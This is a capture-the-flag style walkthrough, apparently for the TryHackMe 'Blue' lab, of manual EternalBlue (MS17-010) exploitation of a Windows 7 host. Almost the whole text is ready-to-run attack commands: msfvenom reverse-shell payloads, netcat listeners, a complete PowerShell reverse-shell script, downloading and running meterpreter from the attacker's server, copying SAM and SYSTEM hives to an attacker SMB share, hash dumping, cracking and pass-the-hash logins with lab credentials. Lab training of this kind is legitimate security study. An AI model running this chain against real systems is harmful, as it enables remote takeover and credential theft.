blue manual

agnusdei · September 18, 2025

THM


Manual EternalBlue (MS17-010) Exploitation - OSCP Style

Target Information

  • IP: 10.201.77.101
  • OS: Windows 7 Professional 7601 Service Pack 1 x64
  • Vulnerable Services: SMB (ports 139, 445)
  • Vulnerabilities: MS17-010 (EternalBlue), MS12-020 (RDP)

Step 1: Initial Reconnaissance

# Port scan
nmap -sV -sC --script vuln -Pn -oN nmap.txt 10.201.77.101 --open

# SMB enumeration
smbclient -L //10.201.77.101 -N
enum4linux -a 10.201.77.101

Step 2: Manual EternalBlue Exploitation

Method 1: Using AutoBlue-MS17-010 (Python Script)

# Clone the repository
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd AutoBlue-MS17-010

# Check if target is vulnerable
python eternal_checker.py 10.201.77.101

# Generate shellcode (replace LHOST with your IP)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.136.212 LPORT=4444 -f raw -o sc_x64.bin

# Alternative: Generate meterpreter payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.8.136.212 LPORT=4444 -f raw -o sc_x64_met.bin

# Start listener
nc -lvnp 4444

# Execute exploit
python eternalblue_exploit7.py 10.201.77.101 sc_x64.bin

Method 2: Using MS17-010 Python Script

# Clone different EternalBlue implementation
git clone https://github.com/worawit/MS17-010.git
cd MS17-010

# Check vulnerability
python checker.py 10.201.77.101

# Generate payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.136.212 LPORT=4444 -f raw > shell.bin

# Start listener
nc -lvnp 4444

# Execute exploit (for Windows 7 x64)
python eternalblue_exploit7.py 10.201.77.101 shell.bin

Step 3: Manual Shell Upgrade (Without Metasploit)

Upgrade to Meterpreter Manually

# Generate meterpreter payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.8.136.212 LPORT=4445 -f exe -o meterpreter.exe

# Start HTTP server to serve payload
python3 -m http.server 8080

# Start meterpreter handler
msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.8.136.212; set lport 4445; exploit"

From the reverse shell obtained in Step 2:

# Download payload from your shell (Invoke-WebRequest needs PowerShell 3+; a stock Windows 7 SP1 box may still run PowerShell 2.0)
powershell -c "Invoke-WebRequest -Uri http://10.8.136.212:8080/meterpreter.exe -OutFile C:\temp\met.exe"

# Execute payload
C:\temp\met.exe

Alternative: PowerShell Reverse Shell

# Create PowerShell reverse shell script
cat > shell.ps1 << 'EOF'
$client = New-Object System.Net.Sockets.TCPClient("10.8.136.212",4445);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + "PS " + (pwd).Path + "> ";
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
}
$client.Close()
EOF

# Start listener
nc -lvnp 4445

# Execute on the target (transfer shell.ps1 there first)
powershell -ExecutionPolicy Bypass -File shell.ps1

Step 4: Post-Exploitation Activities

System Information Gathering

# System info
systeminfo
whoami
whoami /priv
net users
net localgroup administrators

# Network information
ipconfig /all
netstat -an
arp -a

Hash Extraction (Manual)

# Navigate to system directory
cd C:\Windows\System32\config

# Copy SAM and SYSTEM files
copy SAM C:\temp\SAM
copy SYSTEM C:\temp\SYSTEM
copy SECURITY C:\temp\SECURITY

Transfer files to Kali

# On Kali - start SMB server
impacket-smbserver share /tmp -smb2support

# On Windows - copy files
copy C:\temp\SAM \\10.8.136.212\share\SAM
copy C:\temp\SYSTEM \\10.8.136.212\share\SYSTEM

Extract hashes on Kali

# Extract hashes using impacket (run from /tmp, where the SMB share wrote the files)
impacket-secretsdump -sam SAM -system SYSTEM LOCAL

# Crack with John (save the secretsdump output lines to hashes.txt first)
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

Step 5: Flag Collection

# Search for flags
dir /s /b C:\*flag*.txt

# Collect flags
type C:\flag1.txt
type C:\Windows\System32\config\flag2.txt
type C:\Users\Jon\Documents\flag3.txt

Alternative Methods

Method 3: Using Impacket's psexec

# After getting credentials
impacket-psexec jon:alqfna22@10.201.77.101

# Or with hash
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d jon@10.201.77.101

Method 4: WinRM (if enabled)

# Check if WinRM is available
nmap -p 5985,5986 10.201.77.101

# Connect using evil-winrm
evil-winrm -i 10.201.77.101 -u jon -p alqfna22

Key Differences from Metasploit Approach

  1. Manual payload generation: Using msfvenom instead of automatic payload handling
  2. Manual listeners: Using netcat or manual handler setup
  3. Manual file transfers: Using PowerShell, SMB, or HTTP servers
  4. Manual privilege escalation: Manual enumeration and exploitation
  5. Manual persistence: Setting up manual backdoors if needed

Important Notes

  • Always ensure your LHOST is correctly set to your VPN IP
  • Test connectivity between attacker and target
  • Some exploits may require multiple attempts
  • Always verify your payload architecture matches the target (x64 in this case)
  • Consider ASLR/DEP bypass techniques if standard exploits fail

Commands Summary

# Quick exploitation workflow
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd AutoBlue-MS17-010
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f raw -o sc_x64.bin
nc -lvnp 4444
python eternalblue_exploit7.py 10.201.77.101 sc_x64.bin